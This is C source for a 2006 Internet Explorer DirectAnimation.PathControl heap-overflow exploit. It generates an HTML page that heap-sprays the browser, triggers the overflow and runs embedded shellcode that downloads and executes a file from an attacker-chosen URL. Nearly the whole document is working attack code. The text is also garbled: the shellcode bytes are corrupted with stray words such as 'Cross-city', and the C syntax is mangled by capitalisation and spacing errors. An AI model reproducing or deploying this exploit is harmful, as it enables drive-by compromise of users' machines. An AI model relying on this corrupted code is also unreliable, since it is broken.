/*
*-----------------------------------------------------------------------
*
* Daxctle2.c-Internet Explorer COM Object Heap Overflow download EXEC Exploit
*!!! 0 day !!! Public version !!!
*
* Copyright (c) 2006 xsec All Rights Reserved.
*
* Author: NOP
*: NOP # xsec.org
*: Http://www.xsec.org
*:
* Tested: Windows 2000 Server SP4 CN
*: + Internet Explorer 6.0 SP1
*: Windows XP SP2 CN
*: + Internet Explorer 6.0 SP1 (you need some Goodluck!
*:
* Complie: CL daxctle2.c
*:
* Usage: D:/> daxctle2
*:
*: Usage: daxctle <URL> [htmlfile]
*:
*: D:/> daxctle2 http://xsec.org/xxx.exe xxx.htm
*:
*
*------------------------------------------------------------------------
*/
# Include <stdio. h>
# Include <stdlib. h>
File * fp = NULL;
Char * file = "xsec.htm ";
Char * url = NULL;
// Download exec Shellcode by NOP
Unsigned char SC [] =
"/Xe9/xa3/x00/x00/x00/x5f/x64/xA1/x30/x00/x00/x00/x8b/X40/x0c/x8b"
"/Cross-city/x1c/XAD/x8b/x68/x08/x8b/xf7/x6a/x04/x59/xe8/x43/x00/x00/x00"
"/Xe2/xf9/x68/x6f/x6e/x00/x00/x68/x75/x72/x6c/x6d/x54/xFF/x16/x95"
"/Xe8/x2e/x00/x00/x00/x83/xec/x20/x8b/xdc/x6a/x20/x53/xFF/x56/x04"
"/Xc7/x04/x03/x5c/x61/x2e/X65/xc7/x44/x03/x04/x78/X65/x00/x00/x33"
"/Xc0/x50/x50/x53/x57/x50/xFF/x56/x10/x8b/xdc/x50/x53/xFF/x56/x08"
"/XFF/x56/x0c/x51/x56/x8b/x75/x3c/x8b/x74/x2e/x78/x03/xf5/x56/x8b"
"/X76/x20/x03/xf5/x33/xc9/x49/x41/XAD/x03/xc5/x33/XDB/x0f/xbe/x10"
"/X3a/xd6/x74/x08/xc1/xcb/x0d/x03/xda/X40/xeb/xf1/x3b/x1f/x75/xe7"
"/X5e/x8b/x5e/x24/x03/xdd/x66/x8b/x0c/x4b/x8b/x5e/x1c/x03/xdd/x8b"
"/X04/x8b/x03/xc5/XAB/x5e/x59/xc3/xe8/x58/xFF/x8e/x4e/x0e"
"/Xec/xc1/x79/xe5/xb8/x98/xfe/x8a/x0e/XeF/xce/xe0/X60/x36/x1a/x2f"
"/Xi 'an ";
Char * Header =
"<HTML>/N"
"<Head>/N"
"<Title> xsec.org </title>/N"
"</Head>/N"
"<Body>/N"
"<SCRIPT>/N"
"Shellcode = Unescape (/" % u4343/"+/" % u4343/"+/" % u4343/"+/N ";
// Change this script by yourself.
Char * footer =
"Bigbk = Unescape (/" % u0d0d % u0d0d/");/N"
"Headersize = 20;/N"
"Slackspace = headersize + shellcode. Length/N"
"While (bigbk. Length <slackspace) bigbk + = bigbk;/N"
"Fillbk = bigbk. substring (0, slackspace);/N"
"BK = bigbk. substring (0, bigbk. Length-slackspace);/N"
// BK = NOP + NOP ;-)
"While (BK. Length + slackspace <0x40000) BK = BK + fillbk;/N"
"Memory = new array ();/N"
"For (I = 0; I <800; I ++) memory [I] = BK + shellcode;/N"
"Var target = new activexobject (/" DirectAnimation. PathControl/");/N"
"Target. keyframe (0x7fffffff, new array (1), new array (65535);/N"
"</SCRIPT>/N"
"</Body>/N"
"</Html>/N ";
// Print Unicode shellcode
Void printuc (char * lpbuff, int buffsize)
{
Int I, J;
Char * P;
Char MSG [4];
For (I = 0; I <buffsize; I + = 2)
{
If (I % 16) = 0)
{
If (I! = 0)
{
Printf ("/"/n /"");
Fprintf (FP, "% s", "/" +/n /"");
}
Else
{
Printf ("/"");
Fprintf (FP, "% s ","/"");
}
}
Printf ("% u % 0.4x", (unsigned short *) lpbuff) [I/2]);
Fprintf (FP, "% u % 0.4x", (unsigned short *) lpbuff) [I/2]);
}
Printf ("/";/N ");
Fprintf (FP, "% s", "/");/N ");
Fflush (FP );
}
Void main (INT argc, char ** argv)
{
Unsigned char Buf [1024] = {0 };
Int SC _len = 0;
If (argc <2)
{
Printf ("Internet Explorer COM Object Remote Heap Overflow download EXEC Exploit/N ");
Printf ("code by NOP # xsec.org, welcome to http://www.xsec.org/N ");
// Printf ("!!! 0 day !!! Please keep private !!! /N ");
Printf ("/R/nusage: % S <URL> [htmlfile]/R/n", argv [0]);
Exit (1 );
}
Url = argv [1];
// If ((! Strstr (URL, "http ://")&&! Strstr (URL, "ftp: //") | strlen (URL) <10 | strlen (URL)> 60)
If ((! Strstr (URL, "http ://")&&! Strstr (URL, "ftp: //") | strlen (URL) <10)
{
// Printf ("[-] Invalid URL. must start with 'HTTP: // ', 'ftp: //' and <60 bytes./N ");
Printf ("[-] Invalid URL. must start with 'HTTP: // ', 'ftp: //'/N ");
Return;
}
Printf ("[+] Download URL: % s/n", URL );
If (argc> = 3) file = argv [2];
Printf ("[+] exploit file: % s/n", file );
Fp = fopen (file, "W ");
If (! FP)
{
Printf ("[-] Open File error! /N ");
Return;
}
// Print HTML Header
Fprintf (FP, "% s", header );
Fflush (FP );
// Print shellcode
Memset (BUF, 0, sizeof (BUF ));
SC _len = sizeof (SC)-1;
Memcpy (BUF, SC, SC _len );
Memcpy (BUF + SC _len, URL, strlen (URL ));
SC _len + = strlen (URL) + 1;
Printuc (BUF, SC _len );
// Print HTML footer
Fprintf (FP, "% s", footer );
Fflush (FP );
Printf ("[+] exploit write to % s success! /N ", file );
}